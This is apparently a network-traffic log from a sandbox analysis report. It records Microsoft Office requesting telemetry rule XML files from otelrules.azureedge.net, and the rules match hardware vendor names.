                                                                                                                                      2024-11-29 22:11:03 UTC  471                IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                                                                      37          192.168.2.4  49788        13.107.246.63   443
                                                                                                                                      Timestamp                Bytes transferred  Direction  Data
                                                                                                                                      2024-11-29 22:11:03 UTC  192                OUT        GET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:03 UTC  470                IN         HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:03 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 632
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                      ETag: "0x8DC582BB6E3779E"
                                                                                                                                      x-ms-request-id: 6f96f590-e01e-0099-0e7f-3fda8a000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221103Z-174f7845968kdththC1EWRzvxn0000000cv000000000fhge
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:03 UTC  632                IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                                                                      38          192.168.2.4  49789        13.107.246.63   443
                                                                                                                                      Timestamp                Bytes transferred  Direction  Data
                                                                                                                                      2024-11-29 22:11:03 UTC  192                OUT        GET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:04 UTC  470                IN         HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:03 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 467
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                      ETag: "0x8DC582BA6C038BC"
                                                                                                                                      x-ms-request-id: 50b713a5-901e-0015-7a04-42b284000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221103Z-174f78459688l8rvhC1EWRtzr00000000d0g00000000ngd2
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:04 UTC  467                IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                                                                      39          192.168.2.4  49791        13.107.246.63   443
                                                                                                                                      Timestamp                Bytes transferred  Direction  Data
                                                                                                                                      2024-11-29 22:11:05 UTC  192                OUT        GET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:05 UTC  470                IN         HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:05 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 407
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                      ETag: "0x8DC582BBAD04B7B"
                                                                                                                                      x-ms-request-id: e2bedc78-c01e-0066-2f35-40a1ec000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221105Z-174f7845968nxc96hC1EWRspw800000010c0000000001wtd
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:05 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


Session ID | Source IP | Source Port | Destination IP | Destination Port
40 | 192.168.2.4 | 49794 | 13.107.246.63 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:11:05 UTC | 192 | OUT | GET /rules/rule120618v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-29 22:11:05 UTC | 470 | IN | HTTP/1.1 200 OK
Date: Fri, 29 Nov 2024 22:11:05 GMT
Content-Type: text/xml
Content-Length: 486
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
ETag: "0x8DC582B9018290B"
x-ms-request-id: dc0e488f-901e-005b-3891-3f2005000000
x-ms-version: 2018-03-28
x-azure-ref: 20241129T221105Z-174f7845968cdxdrhC1EWRg0en00000010bg00000000pm62
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-29 22:11:05 UTC | 486 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID | Source IP | Source Port | Destination IP | Destination Port
41 | 192.168.2.4 | 49792 | 13.107.246.63 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:11:05 UTC | 192 | OUT | GET /rules/rule120616v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-29 22:11:05 UTC | 470 | IN | HTTP/1.1 200 OK
Date: Fri, 29 Nov 2024 22:11:05 GMT
Content-Type: text/xml
Content-Length: 486
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
ETag: "0x8DC582BB344914B"
x-ms-request-id: 6eac52fb-a01e-006f-2191-3f13cd000000
x-ms-version: 2018-03-28
x-azure-ref: 20241129T221105Z-174f78459685m244hC1EWRgp2c00000010eg00000000346k
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-29 22:11:05 UTC | 486 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID | Source IP | Source Port | Destination IP | Destination Port
42 | 192.168.2.4 | 49793 | 13.107.246.63 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:11:05 UTC | 192 | OUT | GET /rules/rule120617v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-29 22:11:06 UTC | 470 | IN | HTTP/1.1 200 OK
Date: Fri, 29 Nov 2024 22:11:05 GMT
Content-Type: text/xml
Content-Length: 427
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
ETag: "0x8DC582BA310DA18"
x-ms-request-id: cce54a11-701e-006f-7509-42afc4000000
x-ms-version: 2018-03-28
x-azure-ref: 20241129T221105Z-174f7845968glpgnhC1EWR7uec00000010kg00000000r09q
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-29 22:11:06 UTC | 427 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


Session ID | Source IP | Source Port | Destination IP | Destination Port
43 | 192.168.2.4 | 49795 | 13.107.246.63 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:11:05 UTC | 192 | OUT | GET /rules/rule120619v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-29 22:11:06 UTC | 470 | IN | HTTP/1.1 200 OK
Date: Fri, 29 Nov 2024 22:11:06 GMT
Content-Type: text/xml
Content-Length: 407
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
ETag: "0x8DC582B9698189B"
x-ms-request-id: 72388ca2-901e-0029-4711-41274a000000
x-ms-version: 2018-03-28
x-azure-ref: 20241129T221106Z-174f7845968pght8hC1EWRyvxg00000003mg00000000ha3v
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-29 22:11:06 UTC | 407 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


Session ID | Source IP | Source Port | Destination IP | Destination Port
44 | 192.168.2.4 | 49797 | 13.107.246.63 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:11:07 UTC | 192 | OUT | GET /rules/rule120621v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-29 22:11:08 UTC | 470 | IN | HTTP/1.1 200 OK
Date: Fri, 29 Nov 2024 22:11:07 GMT
Content-Type: text/xml
Content-Length: 415
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
ETag: "0x8DC582BA41997E3"
x-ms-request-id: 106d127d-401e-008c-1a91-3f86c2000000
x-ms-version: 2018-03-28
x-azure-ref: 20241129T221107Z-174f7845968swgbqhC1EWRmnb400000010sg000000003f88
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-29 22:11:08 UTC | 415 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      45192.168.2.44979813.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:07 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
2024-11-29 22:11:08 UTC | 470 | IN | HTTP/1.1 200 OK
Date: Fri, 29 Nov 2024 22:11:08 GMT
Content-Type: text/xml
Content-Length: 477
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
ETag: "0x8DC582BB8CEAC16"
x-ms-request-id: f9751f86-801e-0035-08a1-42752a000000
x-ms-version: 2018-03-28
x-azure-ref: 20241129T221108Z-174f7845968j6t2phC1EWRcfe800000010rg000000005w5b
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-29 22:11:08 UTC | 477 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID | Source IP | Source Port | Destination IP | Destination Port
46 | 192.168.2.4 | 49799 | 13.107.246.63 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:11:07 UTC | 192 | OUT | GET /rules/rule120623v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-29 22:11:08 UTC | 470 | IN | HTTP/1.1 200 OK
Date: Fri, 29 Nov 2024 22:11:08 GMT
Content-Type: text/xml
Content-Length: 464
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
ETag: "0x8DC582B97FB6C3C"
x-ms-request-id: a99e6065-701e-006f-4d91-3fafc4000000
x-ms-version: 2018-03-28
x-azure-ref: 20241129T221108Z-174f7845968vqt9xhC1EWRgten00000010g000000000gt3q
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-29 22:11:08 UTC | 464 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


Session ID | Source IP | Source Port | Destination IP | Destination Port
47 | 192.168.2.4 | 49800 | 13.107.246.63 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:11:08 UTC | 192 | OUT | GET /rules/rule120624v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-29 22:11:08 UTC | 470 | IN | HTTP/1.1 200 OK
Date: Fri, 29 Nov 2024 22:11:08 GMT
Content-Type: text/xml
Content-Length: 494
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
ETag: "0x8DC582BB7010D66"
x-ms-request-id: 5e69cd2e-d01e-002b-6bff-4125fb000000
x-ms-version: 2018-03-28
x-azure-ref: 20241129T221108Z-174f7845968pf68xhC1EWRr4h800000010r000000000fszk
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-29 22:11:08 UTC | 494 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID | Source IP | Source Port | Destination IP | Destination Port
48 | 192.168.2.4 | 49802 | 13.107.246.63 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:11:09 UTC | 192 | OUT | GET /rules/rule120626v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-29 22:11:10 UTC | 470 | IN | HTTP/1.1 200 OK
Date: Fri, 29 Nov 2024 22:11:10 GMT
Content-Type: text/xml
Content-Length: 472
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
ETag: "0x8DC582B9DACDF62"
x-ms-request-id: b18988de-c01e-0079-2891-3fe51a000000
x-ms-version: 2018-03-28
x-azure-ref: 20241129T221110Z-174f78459685m244hC1EWRgp2c000000108000000000pa81
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-29 22:11:10 UTC | 472 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID | Source IP | Source Port | Destination IP | Destination Port
49 | 192.168.2.4 | 49803 | 13.107.246.63 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:11:10 UTC | 192 | OUT | GET /rules/rule120627v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-29 22:11:10 UTC | 470 | IN | HTTP/1.1 200 OK
Date: Fri, 29 Nov 2024 22:11:10 GMT
Content-Type: text/xml
Content-Length: 404
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
ETag: "0x8DC582B9E8EE0F3"
x-ms-request-id: f5c4af5a-301e-005d-6385-3fe448000000
x-ms-version: 2018-03-28
x-azure-ref: 20241129T221110Z-174f7845968xlwnmhC1EWR0sv800000010f0000000001m1e
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-29 22:11:10 UTC | 404 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


Session ID | Source IP | Source Port | Destination IP | Destination Port
50 | 192.168.2.4 | 49804 | 13.107.246.63 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:11:10 UTC | 192 | OUT | GET /rules/rule120628v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-29 22:11:11 UTC | 470 | IN | HTTP/1.1 200 OK
Date: Fri, 29 Nov 2024 22:11:10 GMT
Content-Type: text/xml
Content-Length: 468
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
ETag: "0x8DC582B9C8E04C8"
x-ms-request-id: 10a56a44-001e-00ad-35fa-41554b000000
x-ms-version: 2018-03-28
x-azure-ref: 20241129T221110Z-174f78459684bddphC1EWRbht4000000106000000000kve3
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-29 22:11:11 UTC | 468 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID | Source IP | Source Port | Destination IP | Destination Port
51 | 192.168.2.4 | 49796 | 13.107.246.63 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:11:11 UTC | 192 | OUT | GET /rules/rule120620v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      52192.168.2.44980513.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:12 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:12 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:12 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 428
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                      ETag: "0x8DC582BAC4F34CA"
                                                                                                                                      x-ms-request-id: 14e4a643-101e-007a-3c66-40047e000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221112Z-174f7845968cdxdrhC1EWRg0en00000010f000000000d2nf
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:12 UTC | 428 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                      53 | 192.168.2.4 | 49806 | 13.107.246.63 | 443
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-11-29 22:11:12 UTC | 192 | OUT | GET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:13 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:12 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 499
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                                                                      ETag: "0x8DC582B98CEC9F6"
                                                                                                                                      x-ms-request-id: 89e88ad2-001e-0065-4491-3f0b73000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221112Z-174f7845968px8v7hC1EWR08ng00000010v00000000053b4
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:13 UTC | 499 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                      54 | 192.168.2.4 | 49801 | 13.107.246.63 | 443
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-11-29 22:11:13 UTC | 192 | OUT | GET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:13 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:13 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 419
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                                                                      ETag: "0x8DC582B9748630E"
                                                                                                                                      x-ms-request-id: 7e299a61-c01e-0049-0c07-41ac27000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221113Z-174f7845968qj8jrhC1EWRh41s00000010k0000000002xbr
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:13 UTC | 419 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                      55 | 192.168.2.4 | 49808 | 13.107.246.63 | 443
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-11-29 22:11:13 UTC | 192 | OUT | GET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:14 UTC | 471 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:13 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 471
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                      ETag: "0x8DC582BB5815C4C"
                                                                                                                                      x-ms-request-id: 25bfb1e7-201e-00aa-3dab-423928000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221113Z-174f7845968ljs8phC1EWRe6en00000010ag00000000f8ue
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_MISS
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:14 UTC | 471 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                      56 | 192.168.2.4 | 49809 | 13.107.246.63 | 443
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-11-29 22:11:14 UTC | 192 | OUT | GET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:14 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:14 GMT
